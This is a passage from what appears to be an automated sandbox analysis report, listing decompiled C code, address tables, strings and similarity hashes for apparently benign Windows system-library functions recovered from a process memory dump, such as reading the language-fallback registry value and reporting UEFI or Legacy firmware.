				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E04B6F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E04BA95D0();
						}
						if(_t78 != 0) {
							L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E04BAFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E04BABB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E04BA9600();
					if(_t97 < 0) {
						goto L6;
					}
					E04BABB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L04B6F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E04BABB40(_t83, _t102 + 0x24, _t78);
								if(L04B743C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E04BABB40(_t84, _t102 + 0x24, _t94);
									if(L04B743C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x04b6e620
0x04b6e628
0x04b6e62f
0x04b6e631
0x04b6e635
0x04b6e637
0x04b6e63e
0x04bc5503
0x04bc5503
0x04b6e64c
0x04b6e64c
0x04b6e651
0x00000000
0x00000000
0x04b6e661
0x04b6e665
0x04bc542a
0x04b6e715
0x04b6e71a
0x04b6e71c
0x04b6e720
0x04b6e720
0x04b6e727
0x04b6e736
0x04b6e736
0x04b6e743
0x04b6e743
0x04b6e673
0x04b6e678
0x04b6e67d
0x04b6e682
0x04b6e685
0x04b6e692
0x04b6e69b
0x04b6e6a3
0x04b6e6ad
0x04b6e6b1
0x04b6e6b2
0x04b6e6bb
0x04b6e6bf
0x04b6e6c0
0x04b6e6c8
0x04b6e6cc
0x04b6e6d5
0x04b6e6d9
0x00000000
0x00000000
0x04b6e6e5
0x04b6e6ea
0x04b6e6f9
0x04b6e70b
0x04b6e70f
0x04bc5439
0x04bc545e
0x04bc545e
0x00000000
0x04bc545e
0x04bc543b
0x04bc543e
0x04bc5440
0x04bc5445
0x04bc5472
0x04bc5475
0x04bc548d
0x04bc5493
0x04bc54a9
0x00000000
0x00000000
0x04bc54ab
0x04bc54b4
0x04bc54bc
0x04bc54c8
0x04bc54de
0x04bc54fb
0x04bc54e0
0x04bc54e6
0x04bc54eb
0x04bc54eb
0x04bc54de
0x00000000
0x04bc54bc
0x04bc5477
0x04bc547a
0x04bc5480
0x04bc5483
0x04bc5486
0x04bc548b
0x00000000
0x00000000
0x00000000
0x04bc548b
0x00000000
0x00000000
0x00000000
0x00000000
0x04bc5447
0x04bc5447
0x04bc5447
0x04bc5447
0x04bc544e
0x00000000
0x00000000
0x04bc5450
0x04bc5452
0x04bc5455
0x04bc545a
0x00000000
0x00000000
0x00000000
0x04bc545c
0x04bc546a
0x04bc546d
0x04bc546f
0x00000000
0x04bc546f
0x04b6e70f

Strings

InstallLanguageFallback, xrefs: 04B6E6DB
@, xrefs: 04B6E6C0
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 04B6E68C

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 49d6f7bf1fdab37f96dad2e12c28e607d60d70483c9c731b25c220190a008cb0
Instruction ID: 0d4586972240fe4917f308141c0681eaed2b316481d45ae60e0f44ea08e55334
Opcode Fuzzy Hash: 49d6f7bf1fdab37f96dad2e12c28e607d60d70483c9c731b25c220190a008cb0
Instruction Fuzzy Hash: 39518E75508325ABD724DF68D480AAAB3E8EF88714F4509AEB995D7240F734F90487A2

Uniqueness

Uniqueness Score: -1.00%

Function 04BE51BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E04BE51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x4c405f0);
				E04BBD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E04B7EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E04BE53CA(0);
						return E04BBD130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E04BAF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E04B83690(1, _t117, 0x4b41810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E04BAAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L04B84620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E04BAAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E04BE500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E04BA9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x04be51be
0x04be51c3
0x04be51c8
0x04be51cd
0x04be51d0
0x04be51d3
0x04be51d8
0x04be51db
0x04be51de
0x04be51e0
0x04be51e3
0x04be51e6
0x04be51e8
0x04be5342
0x04be5351
0x04be5356
0x04be535a
0x04be5360
0x04be5363
0x04be5366
0x04be5369
0x04be5369
0x04be536b
0x04be536b
0x04be5370
0x04be53a3
0x04be53a4
0x04be53a6
0x04be53ab
0x04be53ab
0x04be53ae
0x04be53ae
0x04be53b5
0x04be53bf
0x04be53bf
0x04be5375
0x04be5396
0x04be53a0
0x04be53a0
0x00000000
0x04be5396
0x04be5377
0x04be5379
0x04be537f
0x04be538c
0x04be5390
0x00000000
0x04be5390
0x04be51ee
0x04be51f1
0x04be5301
0x04be5310
0x04be5315
0x04be5318
0x04be531b
0x04be5320
0x04be532e
0x04be5331
0x00000000
0x04be5331
0x04be5328
0x04be5329
0x00000000
0x04be5329
0x04be51fa
0x04be5235
0x04be5236
0x04be5239
0x04be523f
0x04be5240
0x04be5241
0x04be5242
0x04be5246
0x04be5247
0x04be524e
0x04be5251
0x04be5267
0x04be5269
0x04be526e
0x04be527d
0x04be527e
0x04be5281
0x04be5282
0x04be5287
0x04be5288
0x04be528a
0x04be528f
0x04be5294
0x00000000
0x00000000
0x04be529a
0x04be529c
0x04be529e
0x04be529e
0x04be52a4
0x04be52b0
0x00000000
0x00000000
0x04be52ba
0x04be52bc
0x04be52bc
0x04be52d4
0x04be52d9
0x04be52dc
0x04be52e1
0x00000000
0x00000000
0x04be52e7
0x04be52f4
0x00000000
0x04be52f4
0x04be5270
0x00000000
0x04be5270
0x04be51fc
0x04be51fd
0x04be5202
0x04be5203
0x04be5205
0x04be520a
0x04be520f
0x00000000
0x00000000
0x04be521b
0x04be5226
0x04be522b
0x04be521d
0x04be521d
0x04be5222
0x04be5222
0x04be522d
0x00000000

Strings

UEFI, xrefs: 04BE521D
Legacy, xrefs: 04BE5226

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 58f11cca2d045f7f6dfa96af3bad9c1221896c240f8f9cfe5a94a3109797585b
Instruction ID: 69f08b41ec56f95afeda70a61b6b7c67de7a0730168e814d3042be77c258cfa3
Opcode Fuzzy Hash: 58f11cca2d045f7f6dfa96af3bad9c1221896c240f8f9cfe5a94a3109797585b
Instruction Fuzzy Hash: 5B517F71A04609AFDB24DFA9C840ABDBBF8FF88708F5444ADE55AEB251D771A900CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04B6B171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E04B6B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x4c3f7a8);
				E04BBD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E04BBD130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E04BAD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E04BAF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L04BBDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E04BAB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E04BAB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E04BAE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E04BAA890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x04b6b171
0x04b6b171
0x04b6b171
0x04b6b171
0x04b6b171
0x04b6b176
0x04b6b17b
0x04b6b180
0x04b6b186
0x04b6b18f
0x04b6b198
0x04b6b1a4
0x04b6b1aa
0x04bc4802
0x04bc4802
0x04bc4805
0x04bc480c
0x04bc480e
0x04b6b1d1
0x04b6b1d3
0x04b6b1de
0x04b6b1de
0x04bc4817
0x04bc481e
0x04bc4820
0x04bc4822
0x04bc4822
0x04bc4824
0x04bc4824
0x04bc482a
0x00000000
0x00000000
0x04bc4835
0x04bc483a
0x04bc483d
0x04bc483f
0x04bc4842
0x04bc4842
0x04bc4842
0x04bc4846
0x04bc484c
0x04bc484e
0x04bc4851
0x04bc4851
0x04bc4853
0x04bc4854
0x04bc4854
0x04bc4858
0x04bc485a
0x04bc485a
0x04bc485d
0x04bc485f
0x04bc4861
0x04bc4861
0x04bc4866
0x04bc486b
0x04bc486e
0x04bc4871
0x04bc4876
0x04bc4876
0x04bc4878
0x04bc487b
0x04bc4884
0x04bc4884
0x00000000
0x04bc487d
0x04bc487d
0x04bc4882
0x04bc4889
0x04bc4889
0x04bc488f
0x04bc4891
0x04bc48e0
0x04bc48e2
0x04bc48e4
0x04bc48e4
0x04bc48e7
0x04bc48e7
0x04bc48ed
0x04bc48f4
0x04bc48f6
0x04bc4951
0x04bc4951
0x04bc4953
0x04bc4953
0x04bc4956
0x04bc4956
0x04bc4958
0x04bc4959
0x04bc4959
0x04bc495d
0x04bc495d
0x04bc495f
0x04bc495f
0x04bc4965
0x04bc4969
0x04bc49ba
0x04bc49ba
0x04bc49c1
0x04bc49c5
0x04bc49cc
0x04bc49d4
0x04bc49d7
0x04bc49da
0x04bc49e4
0x04bc49e5
0x04bc49f3
0x04bc4a02
0x00000000
0x04bc4a02
0x04bc4972
0x04bc4974
0x00000000
0x00000000
0x04bc4976
0x04bc4979
0x04bc4982
0x04bc4983
0x04bc4984
0x04bc498b
0x04bc498d
0x04bc4991
0x04bc4993
0x04bc4999
0x04bc499d
0x04bc49a2
0x04bc49a2
0x04bc49a2
0x04bc4999
0x04bc49ac
0x00000000
0x04bc49b3
0x04bc48f8
0x04bc48fe
0x00000000
0x00000000
0x00000000
0x04bc48fe
0x04bc4895
0x04bc489c
0x04bc48ad
0x04bc48b2
0x04bc48b5
0x04bc48b7
0x04bc48ba
0x04bc48bc
0x04bc48c6
0x04bc48c6
0x04bc48cb
0x04bc48d1
0x04bc48d4
0x04bc48d8
0x04bc48d8
0x00000000
0x04bc48d8
0x04bc48be
0x04bc48c0
0x00000000
0x00000000
0x04bc48c2
0x00000000
0x00000000
0x00000000
0x04bc48c4
0x00000000
0x04bc4882
0x04bc487b
0x04bc4904
0x04bc4906
0x00000000
0x00000000
0x04bc4908
0x04bc490e
0x00000000
0x00000000
0x04bc4910
0x04bc4917
0x04bc4917
0x00000000
0x04bc4917
0x04b6b1ba
0x04bc47f9
0x04bc47fc
0x00000000
0x00000000
0x00000000
0x04bc47fc
0x04b6b1c0
0x04b6b1c0
0x04b6b1c3
0x04b6b1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 04BC48AD

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 5837063f7c8ec4d7567aedde6194b2de2afa6b6694498b397672ddfcde61f2b3
Instruction ID: bcb12d5801a89872c593ec660240dd2a6a110b8e5888cc3653c17343b354c23b
Opcode Fuzzy Hash: 5837063f7c8ec4d7567aedde6194b2de2afa6b6694498b397672ddfcde61f2b3
Instruction Fuzzy Hash: F351D171E142698EEF30CF64C8A4BBEBBB1EF04714F1042EDD859AB281D7746A458F91

Uniqueness

Uniqueness Score: -1.00%

Function 04B8B944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E04B8B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x4c5d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E04B87D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E04C38CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E04BA9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E04BAB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E04BACE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E04B87D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E04C38F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E04BAAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x4c58628; // 0x0
								_v68 = _t77;
								_t78 =  *0x4c5862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x4c58628; // 0x0
							_t116 =  *0x4c5862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x04b8b94c
0x04b8b956
0x04b8b95c
0x04b8b95e
0x04b8b964
0x04b8b969
0x04b8b96d
0x04b8b96d
0x04b8b970
0x04b8b974
0x04b8b97a
0x04b8badf
0x04b8badf
0x04b8bae2
0x04b8bae4
0x04b8bae6
0x04b8baf0
0x04bd2cb8
0x04b8baf6
